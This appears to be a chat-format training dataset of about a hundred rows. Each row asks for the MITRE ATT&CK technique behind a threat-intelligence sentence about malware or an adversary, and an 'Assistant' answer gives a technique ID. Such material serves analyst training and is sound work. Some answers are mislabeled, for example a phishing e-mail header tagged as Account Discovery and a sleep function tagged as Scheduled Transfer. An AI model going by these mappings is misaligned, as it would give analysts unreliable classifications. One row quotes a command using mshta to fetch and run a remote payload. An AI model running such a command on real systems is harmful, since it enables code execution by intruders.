text
stringlengths
104
2.24k
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has packed malware with UPX.### Assistant: T1027: Obfuscated Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values.### Assistant: T1547: Boot or Logon Autostart Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more.### Assistant: T1484: Domain Policy Modification
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has decrypted strings and imports using RC4 during execution.### Assistant: T1140: Deobfuscate/Decode Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control.### Assistant: T1205: Traffic Signaling
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to use -WindowStyle Hidden to conceal PowerShell windows.### Assistant: T1564: Hide Artifacts
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.### Assistant: T1027: Obfuscated Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.### Assistant: T1528: Steal Application Access Token
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the flaw being exploited this may include Exploitation for Defense Evasion.### Assistant: T1190: Exploit Public-Facing Application
### Human:Find the techniques and ID from MITRE ATT&CK framework.,InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe.### Assistant: T1218: Signed Binary Proxy Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy can steal clipboard contents.### Assistant: T1115: Clipboard Data
### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can sleep for a given number of seconds.### Assistant: T1029: Scheduled Transfer
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has used forged Microsoft code-signing certificates on malware.### Assistant: T1553: Subvert Trust Controls
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.### Assistant: T1083: File and Directory Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI can gather information on drives and the operating system on the victim’s machine.### Assistant: T1082: System Information Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary.### Assistant: T1565: Data Manipulation
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has decrypted encrypted strings.### Assistant: T1140: Deobfuscate/Decode Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Volgmer variant is encoded using a simple XOR cipher.### Assistant: T1027: Obfuscated Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,SPACESHIP copies staged data to removable drives when they are inserted into the system.### Assistant: T1052: Exfiltration Over Physical Medium
### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.### Assistant: T1553: Subvert Trust Controls
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet can brute force a local admin password, then use it to facilitate lateral movement.### Assistant: T1078: Valid Accounts
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used a module named NewBCtestnDll64 as a reverse SOCKS proxy.### Assistant: T1090: Proxy
### Human:Find the techniques and ID from MITRE ATT&CK framework.,If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000.### Assistant: T1095: Non-Application Layer Protocol
### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to hide the window for operations performed on a given file.### Assistant: T1564: Hide Artifacts
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp can download and execute new plugins from the C2 server.### Assistant: T1105: Ingress Tool Transfer
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Message 2: Headers Received: by mailcenter.support Sender Council on Foreign Relations <webprint@fprii.net> Subject The Four Traps China May Fall Into Body Content and images included within the e-mail body were a direct copy of the following CFR article: https://www.cfr.org/blog/four-traps-china-may-fall Notes Multiple hyperlinks within the e-mail body lead to a malicious RTF document located at the URL hxxp://fprii.net/The_Four_Traps_for_China.doc### Assistant: T1087: Account Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer collects the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.### Assistant: T1082: System Information Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files may be executed by mshta.exe through an inline script: mshta vbscript:Close" They may also be executed directly from URLs: mshta http://webserver/payload.hta Mshta.exe can be used to bypass application control solutions that do not account for its potential use.### Assistant: T1218: Signed Binary Proxy Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has captured credentials via fake Outlook Web App login pages and has also used a .NET based keylogger.### Assistant: T1056: Input Capture
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has collected the current date and time of the victim system.### Assistant: T1124: System Time Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use side-loading to run malicious executables.### Assistant: T1574: Hijack Execution Flow
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has obfuscated its strings with a simple XOR encryption with a static key.### Assistant: T1027: Obfuscated Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the string is present, the malware executes the command RunDll32.exe### Assistant: T1218: Signed Binary Proxy Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,This Registry key is not created by default during an Office installation.### Assistant: T1137: Office Application Startup
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use binary padding to add junk data and change the on-disk representation of malware.### Assistant: T1027: Obfuscated Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has used RC4 encryption to download modules.### Assistant: T1573: Encrypted Channel
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.### Assistant: T1059: Command and Scripting Interpreter
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.### Assistant: T1090: Proxy
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Later versions have hard-coded keys uniquely for each C2 address.### Assistant: T1573: Encrypted Channel
### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.### Assistant: T1529: System Shutdown/Reboot
### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload.### Assistant: T1140: Deobfuscate/Decode Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.### Assistant: T1082: System Information Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy and/or steal code signing certificates that can be used during targeting.### Assistant: T1588: Obtain Capabilities
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used appcmd.exe to disable logging on a victim server.### Assistant: T1562: Impair Defenses
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The de facto standard across cloud service providers is to host the Instance Metadata API at http://169.254.169.254.### Assistant: T1552: Unsecured Credentials
### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM has the ability to use WMI to delete volume shadow copies.### Assistant: T1047: Windows Management Instrumentation
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Discovery Inspector protects customers from these threats via this DDI Rule: DDI Rule 18 : DNS response of a queried malware Command and Control domain DDI Rule 15 : Many unsuccessful logon attempts (nbt_scan.exe) DDI Rule 38 : Multiple unsuccessful logon attempts (nbt_scan.exe) TippingPoint customers are protected from these threats via these ThreatDV filters: 27218: HTTP: TROJ_RATANKBA_A Checkin 28219: HTTP: TROJ_RATANKBA_A Checkin 02 27220: HTTPS: TROJ_RATANKBA_A Checkin 27221: HTTP: Sundown EK Flash Exploit (SWF_EXPLOYT.YYRQ) A list of related Indicators of Compromise (IoCs) can be found in this appendix### Assistant: T1071: Application Layer Protocol
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained.### Assistant: T1110: Brute Force
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.### Assistant: T1486: Data Encrypted for Impact
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also directly start services through Service Execution.### Assistant: T1543: Create or Modify System Process
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher has used CreateProcessW API for execution.### Assistant: T1106: Native API
### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Destover-like variant used by Lazarus Group also gathers process times.### Assistant: T1057: Process Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor### Assistant: T1036: Masquerading
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can gather a list of running processes by using Tasklist.### Assistant: T1057: Process Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted.### Assistant: T1587: Develop Capabilities
### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to c8:27:cc:c2:37:5a.### Assistant: T1497: Virtualization/Sandbox Evasion
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerberos authentication can be used as the first step to lateral movement to a remote system.### Assistant: T1550: Use Alternate Authentication Material
### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can enumerate the CPUID and BIOS version on a compromised system.### Assistant: T1082: System Information Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.### Assistant: T1010: Application Window Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this case, the malicious emails contain links.### Assistant: T1566: Phishing
### Human:Find the techniques and ID from MITRE ATT&CK framework.,CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.### Assistant: T1003: OS Credential Dumping
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon uses the net group command.### Assistant: T1069: Permission Groups Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can gather a list of processes.### Assistant: T1057: Process Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to find group and permission settings.### Assistant: T1069: Permission Groups Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage can execute arbitrary commands with the command line.### Assistant: T1059: Command and Scripting Interpreter
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cluster A Case 1: Delivery via document property macro – a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483  In our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to launch the malware### Assistant: T1204: User Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.### Assistant: T1071: Application Layer Protocol
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lateral Movement APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP)### Assistant: T1021: Remote Services
### Human:Find the techniques and ID from MITRE ATT&CK framework.,This approach may be used to avoid triggering network data transfer threshold alerts.### Assistant: T1030: Data Transfer Size Limits
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Sakula samples install themselves as services for persistence by calling WinExec with the net start argument.### Assistant: T1543: Create or Modify System Process
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document.### Assistant: T1140: Deobfuscate/Decode Files or Information
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used PsExec to deploy beacons on compromised systems.### Assistant: T1569: System Services
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems.### Assistant: T1550: Use Alternate Authentication Material
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other accessibility features exist that may also be leveraged in a similar fashion: * On-Screen Keyboard: C:\Windows\System32\osk.exe * Magnifier: C:\Windows\System32\Magnify.exe * Narrator: C:\Windows\System32\Narrator.exe * Display Switcher: C:\Windows\System32\DisplaySwitch.exe * App Switcher: C:\Windows\System32\AtBroker.exe Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.### Assistant: T1546: Event Triggered Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs### Assistant: T1055: Process Injection
### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used InstallUtil.exe to execute malicious software.### Assistant: T1218: Signed Binary Proxy Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APC injection is commonly performed by attaching malicious code to the APC Queue of a process's thread.### Assistant: T1055: Process Injection
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ARP protocol is stateless and does not require authentication.### Assistant: T1557: Adversary-in-the-Middle
### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has encrypted TCP communications to evade detection.### Assistant: T1573: Encrypted Channel
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to use a DGA for C2 communications.### Assistant: T1568: Dynamic Resolution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process.### Assistant: T1010: Application Window Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The binary will then be executed by the system when the authentication packages are loaded.### Assistant: T1547: Boot or Logon Autostart Execution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus uses command line for execution.### Assistant: T1059: Command and Scripting Interpreter
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ELMER is capable of performing process listings.### Assistant: T1057: Process Discovery
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has encrypted C2 commands with AES-256.### Assistant: T1573: Encrypted Channel
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cracking hashes is usually done on adversary-controlled systems outside of the target network.### Assistant: T1110: Brute Force
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement### Assistant: T1059: Command and Scripting Interpreter
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX can be configured to use HTTP for command and control.### Assistant: T1071: Application Layer Protocol
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.### Assistant: T1572: Protocol Tunneling
### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT28 loader Trojan uses a cmd.exe and batch script to run its payload.### Assistant: T1059: Command and Scripting Interpreter
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment.### Assistant: T1497: Virtualization/Sandbox Evasion
### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin has a command named $screenshot that may be responsible for taking screenshots of the victim machine.### Assistant: T1113: Screen Capture
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.### Assistant: T1491: Defacement
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“### Assistant: T1113: Screen Capture
### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOSTWRITE has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.### Assistant: T1574: Hijack Execution Flow
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar uses HTTP and HTTPS to communicate with the C2 server.### Assistant: T1071: Application Layer Protocol
### Human:Find the techniques and ID from MITRE ATT&CK framework.,A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS .### Assistant: T1499: Endpoint Denial of Service
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address.### Assistant: T1568: Dynamic Resolution
### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM leveraged valid accounts to maintain access to a victim network.### Assistant: T1078: Valid Accounts
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has dumped credentials from victims in several ways, including by using open source tools Mimikatz and Lazagne, or by harvesting credentials when users log into Outlook Web Access.### Assistant: T1003: OS Credential Dumping